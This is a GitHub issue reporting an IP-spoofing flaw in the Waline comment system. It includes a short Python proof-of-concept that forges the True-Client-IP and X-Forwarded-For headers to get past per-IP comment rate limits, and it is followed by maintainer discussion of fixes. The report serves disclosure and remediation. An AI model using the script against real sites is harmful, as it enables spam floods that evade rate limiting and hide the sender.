Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Bug]: waline fake any ip vulnerability #785

Closed
ghost opened this issue Jan 30, 2022 · 7 comments
Closed

[Bug]: waline fake any ip vulnerability #785

ghost opened this issue Jan 30, 2022 · 7 comments
Labels
discussion Question or dicussion Needs more info Further information is needed waiting for response Reply is wanted

Comments

@ghost
Copy link

ghost commented Jan 30, 2022

问题描述 | Describe the bug

waline-fake-any-ip-poc

A Proof-Of-Concept for the recently found waline fake any ip vulnerability.

In this repository we have made and example vulnerable application and proof-of-concept (POC) exploit of it.

Proof-of-concept (POC)

As a PoC we have created a python file that automates the process.

Requirements:

pip install requests

Usage:

python3 poc.py

Source:

#######  poc.py
#======= Disclaimer: ========================================================================================#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import requests
import random

def getRandStr(len):
  str=""
  dict = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
  for i in range(len):
    str = str + random.choice(dict)
  return str

attack_url = "https://waline-test-poc.vercel.app" # This is an attack url 

fake_ip = "This is a fake IP " + getRandStr(6) # This is a fake IP or any other string

headers ={}
headers['User-Agent']="Mozilla/5.0 test " + getRandStr(6)
headers['X-Forwarded-For']= "0.0.0.0"
headers['True-Client-IP']= fake_ip # fake ip

data={
  "comment": "test comment " + getRandStr(6),
  "nick": "test nick " + getRandStr(6),
  "mail": getRandStr(6) + "@test.com",
  "link": "https://" + getRandStr(6) + ".com",
  "ua": "Mozilla/5.0 test " + getRandStr(6),
  "url": "/",
}
res=requests.post(url = attack_url + "/comment", headers = headers, data = data)
print(res.text)

Result:

0

Our vulnerable application

waline deploy:

  • @waline/vercel 1.6.0
  • @waline/client 1.5.2

data store:

  • LeannCloud

get started:

https://waline.js.org/guide/get-started.html

Influence

IP-based comment posting frequency limits IPQPS may be rendered useless.

This vulnerability can be used to fake the IP address and bypass the IP frequency limit of the comment system software(waline), so that the comment system administrator cannot accurately obtain the IP address of the sender.

Reason

This vulnerability is usually caused by a misconfiguration on the server side.

References

Exploit in the field

According to the issues of Github of the project waline, from July 18 to July 20, 2021, an attacker bombarded all websites using Waline by Posting spam comments with faked IP addresses, so it is speculated that this vulnerability has been exploited in the field.

Solutions

Software maintainers have provided a solution to this vulnerability.

There is nothing we can do about it on vercel. But we should be able to block these requests on a self hold env.(#792 (reply in thread))

In self host mode, we can set maxIpsCount to proxy server layers to get a real ip. https://koajs.com/#settings (#792 (reply in thread))

Disclaimer

This repository is not intended to be a one-click exploit to waline fake any ip vulnerability. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

Our team will not aid, or endorse any use of this exploit for malicious activity, thus if you ask for help you may be required to provide us with proof that you either own the target service or you have permissions to pentest on it.

LICENSE

BSD 3-Clause License

Copyright (c) 2022, ihackerx
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1. Redistributions of source code must retain the above copyright notice, this
   list of conditions and the following disclaimer.

2. Redistributions in binary form must reproduce the above copyright notice,
   this list of conditions and the following disclaimer in the documentation
   and/or other materials provided with the distribution.

3. Neither the name of the copyright holder nor the names of its
   contributors may be used to endorse or promote products derived from
   this software without specific prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

问题网站 | Website URL

https://waline.js.org

服务部署在哪里? | Where your waline deploy?

Vercel (Default)

数据存储在哪里?| Where your comment data store?

LeanCloud(https://leancloud.app)

@ghost ghost added the bug Something isn't working label Jan 30, 2022
@lizheming
Copy link
Collaborator

As I know, there has no way to get user ip from client trustly. And IPQPS just works for some freshman hacker that I have told waline user at the user group. Do you have any great idea about IPQPS to avoid the vulnerability? I'll implement it if it works.

@Mister-Hope
Copy link
Member

Can we get the remoteIP and ban the remoteIp together?

If necessary, ban all the ips in x-forwarded-for . can't that work?

@Mister-Hope
Copy link
Member

Mister-Hope commented Jan 30, 2022

(I majored in physics, though), but I had a NRCE 3 test. A tcp connet needs 3 handshake, so at least the remoteIP can not be faked in my mind.

Is there any difficulties blocking it? (Such as can not get it in Node?) Or are there side effects doing that?

@lizheming lizheming added discussion Question or dicussion Needs more info Further information is needed waiting for response Reply is wanted and removed bug Something isn't working labels Feb 5, 2022
@ghost ghost closed this as completed Feb 6, 2022
@ghost ghost reopened this Feb 6, 2022
@ghost
Copy link
Author

ghost commented Feb 6, 2022

This vulnerability is usually caused by a misconfiguration on the server side.

Because IP frequency limits depend on obtaining the correct IP, how to obtain the correct IP rather than IPQPS is the fundamental solution to the problem.

It's easy to fake X-Forwarded-For, and it should be used with great care.

Get the client IP for the direct TCP connection using RemoteAddr.
If there are multiple tiers of proxies, RemoteAddr must be configured on the server directly connected to the external server, and X-Forwarded-For must be configured on the inner server. Otherwise, the inner server overwrites the real IP address of the client.

Software maintainers have provided a solution to this vulnerability.

There is nothing we can do about it on vercel. But we should be able to block these requests on a self hold env.(#792 (reply in thread))

In self host mode, we can set maxIpsCount to proxy server layers to get a real ip. (#792 (reply in thread))

@ghost
Copy link
Author

ghost commented Feb 7, 2022

Here's another way to do it.
Set a layer of CDN or firewall outside the application to fetch RemoteAddr. X-forwarded-for is used inside the application.
such as #429 #405
(cc @oCoke @karuboniru)

@ghost
Copy link
Author

ghost commented Feb 25, 2022

There is no more information here, I will close it, if you have other solutions please leave a message below.

@ghost ghost closed this as completed Feb 25, 2022
@lizheming
Copy link
Collaborator

Good News! It seems vercel has fixed the bug now. User can not fake ip by true-client-ip header.

image

This issue was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
discussion Question or dicussion Needs more info Further information is needed waiting for response Reply is wanted
Projects
None yet
Development

No branches or pull requests

2 participants